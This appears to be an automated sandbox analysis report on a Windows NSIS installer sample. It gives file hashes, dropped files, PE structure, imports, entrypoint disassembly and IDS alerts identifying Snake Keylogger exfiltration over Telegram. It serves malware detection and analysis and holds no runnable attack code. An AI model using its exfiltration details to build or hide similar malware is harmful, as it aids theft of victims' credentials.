                                                                                                          SSDEEP:6144:BXvtGbv4RD5mE0/m97evA/V94wNLgC6iJ4dsjnRBpif:BXVIvsMpMeA/V94ZCmdkRfA
                                                                                                          MD5:9E47063807062051CA0A82BD7A4F10BE
                                                                                                          SHA1:BA22C4BE24119B1386A1B54E42EF4258233B6B67
                                                                                                          SHA-256:79D66FF49DB8E9E21D963393FEFC4F3E5139EEB212B7F53220A66D2B145BD7D6
                                                                                                          SHA-512:91536F5C93DD735DE1293303A8F132562C9CF071B8EDBF397D3338CC29C91BA7D4DB34790B207C0BD28C65F635D0376F4996888501ECED83843648CA098B6D29
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.4444......z..''........:::.KK.... ...E.................l.................H.........UUUUU......B......P.))............hh.,,............NN................zzz.....ii....................................~..................U........@@.;;.......&&...........................................................E............................ii...\\\..............QQQ..q.......YYY..-.....55......7......F........RR...............dd...................VV.......................5.............................................,.ZZZ........................... .....G.---....i......................T.......&......B...............s..........................5....b.....m.......`.a...........X.............~~...z.v........vv...M.^.....G..!......a.<...................................\...........................Q.f................................||..................&&.u.....dddd....+..................................======..........88..........\\\.GGGG.....O..................!!..v......................w."............

                                                                                                          C:\Users\user\AppData\Local\Iw\Sensuousnesses.opk

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):362089
                                                                                                          Entropy (8bit):1.23992084267325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                          MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                          SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                          SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                          SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                          Malicious:false
                                                                                                          Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............

                                                                                                          C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):5.719859767584478
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                          MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                          SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                          SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                          SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: b5BQbAhwVD.exe, Detection: malicious, Browse
                                                                                                          • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                                                                          • Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse
                                                                                                          • Filename: V7OHj6ISEo.exe, Detection: malicious, Browse
                                                                                                          • Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse
                                                                                                          • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                                                                          • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                          • Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse
                                                                                                          • Filename: 4UQ5wnI389.exe, Detection: malicious, Browse
                                                                                                          • Filename: ajRZflJ2ch.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\nsuC035.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1511591
                                                                                                          Entropy (8bit):5.466660339097473
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:QeVI0N994Mjbo3xX3y4bz2lWwWo6rSTZyDnX8:E0NP4qoBXbz2luo6rS1yz8
                                                                                                          MD5:CFD0C4C2A683850FAFD1B81CC97F2763
                                                                                                          SHA1:3155004207814F7877863A4ADD4C6258D4E84A2C
                                                                                                          SHA-256:598F31497631F543E1EA32C275BFE9C75CD3EEFF73CCABAC0C0F44938BB235D5
                                                                                                          SHA-512:95F9BA70AF2AABD8D63F6E73379C832B31351A520367A580B6FE1A45295F9C7DCBB2A9AF51DE9B0175D973AF823086FAA3FAE1D6BB945FC727421D6B728AC0B1
                                                                                                          Malicious:false
                                                                                                          Preview:X6......,.......,.......\........!.......5.......6..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.960601663335954
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:rXKfKM0T49.exe
                                                                                                          File size:1'034'264 bytes
                                                                                                          MD5:948a8f01fca4eecddbcb1c20b26a0a53
                                                                                                          SHA1:f1254c7c3a1051c4624072c07f725aa62ff4a316
                                                                                                          SHA256:28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad
                                                                                                          SHA512:655c9aa0c0d74a7ba7e260429bc2d20d89bf9057b597f43b71ad97f4e2a925506564bc042363424a7d791e61697de361418c40a8c15608a635e0a37d48674123
                                                                                                          SSDEEP:24576:9jwKCNv1K8uI69d68+cOGyQA81xfEsc/fbCi1WYH/:V1CV1Fu59ZH76C8WYf
                                                                                                          TLSH:3E252309D880EEB2D5FB19306DE2F213B7A7B81210A1916B3762373F78B55918C5EBD4
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....

                                                                                                          File Icon

                                                                                                          Icon Hash:46224e4c19391d03

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x4034a5
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push 00000020h
                                                                                                          pop edi
                                                                                                          xor ebx, ebx
                                                                                                          push 00008001h
                                                                                                          mov dword ptr [esp+14h], ebx
                                                                                                          mov dword ptr [esp+10h], 0040A230h
                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                          call dword ptr [004080ACh]
                                                                                                          call dword ptr [004080A8h]
                                                                                                          and eax, BFFFFFFFh
                                                                                                          cmp ax, 00000006h
                                                                                                          mov dword ptr [0042A24Ch], eax
                                                                                                          je 00007FC80D1D2F73h
                                                                                                          push ebx
                                                                                                          call 00007FC80D1D623Dh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007FC80D1D2F69h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          mov esi, 004082B0h
                                                                                                          push esi
                                                                                                          call 00007FC80D1D61B7h
                                                                                                          push esi
                                                                                                          call dword ptr [00408150h]
                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                          cmp byte ptr [esi], 00000000h
                                                                                                          jne 00007FC80D1D2F4Ch
                                                                                                          push 0000000Ah
                                                                                                          call 00007FC80D1D6210h
                                                                                                          push 00000008h
                                                                                                          call 00007FC80D1D6209h
                                                                                                          push 00000006h
                                                                                                          mov dword ptr [0042A244h], eax
                                                                                                          call 00007FC80D1D61FDh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007FC80D1D2F71h
                                                                                                          push 0000001Eh
                                                                                                          call eax
                                                                                                          test eax, eax
                                                                                                          je 00007FC80D1D2F69h
                                                                                                          or byte ptr [0042A24Fh], 00000040h
                                                                                                          push ebp
                                                                                                          call dword ptr [00408044h]
                                                                                                          push ebx
                                                                                                          call dword ptr [004082A0h]
                                                                                                          mov dword ptr [0042A318h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 004216E8h
                                                                                                          call dword ptr [00408188h]
                                                                                                          push 0040A384h

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                          RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                          RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                          RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                          RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                          RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                          RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                          RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                          RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                          RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                          RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                          RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                          RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                          RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                          RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                          RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                          RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                          RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                          RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                          RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-10T23:11:47.560964+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949972216.58.206.46443TCP
                                                                                                          2025-01-10T23:11:52.664493+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949975132.226.247.7380TCP
                                                                                                          2025-01-10T23:11:59.398915+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949975132.226.247.7380TCP
                                                                                                          2025-01-10T23:12:00.055572+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949977149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:00.281914+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949977149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:01.242641+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949978132.226.247.7380TCP
                                                                                                          2025-01-10T23:12:01.813771+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949979149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:02.042849+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949979149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:02.789544+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949980132.226.247.7380TCP
                                                                                                          2025-01-10T23:12:03.365561+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949981149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:03.589477+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949981149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:04.932807+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949983149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:05.263746+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949983149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:06.599379+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949985149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:06.806211+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949985149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:08.162259+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949987149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:08.373482+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949987149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:09.776645+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949989149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:09.991034+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949989149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:11.295791+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949992149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:11.627973+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949992149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:12.996532+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949994149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:13.282728+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949994149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:14.599622+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949996149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:14.861651+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949996149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:16.206189+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.949998149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:17.130510+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949998149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:18.465680+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950000149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:18.755647+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950000149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:20.069772+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950002149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:20.282175+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950002149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:21.674756+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950004149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:21.929004+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950004149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:23.301443+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950006149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:23.510404+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950006149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:25.862990+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950008149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:26.221835+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950008149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:27.550625+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950010149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:27.866639+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950010149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:29.219177+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950012149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:29.438612+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950012149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:30.766263+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950014149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:30.991536+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950014149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:32.422148+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950016149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:32.714699+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950016149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:34.024915+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950018149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:34.305790+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950018149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:35.619872+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950020149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:35.900793+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950020149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:37.213771+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950022149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:37.515075+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950022149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:38.823917+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950024149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:39.041100+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950024149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:40.369055+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950026149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:40.813386+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950026149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:42.142601+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950028149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:42.356372+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950028149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:43.684809+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950030149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:43.983727+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950030149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:45.322823+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950032149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:45.635718+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950032149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:46.956393+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950034149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:47.246674+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950034149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:48.591683+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950036149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:48.883420+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950036149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:50.197296+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950038149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:50.406858+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950038149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:51.750955+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950040149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:52.085861+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.950040149.154.167.220443TCP
                                                                                                          2025-01-10T23:12:53.422065+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.950042149.154.167.220443TCP
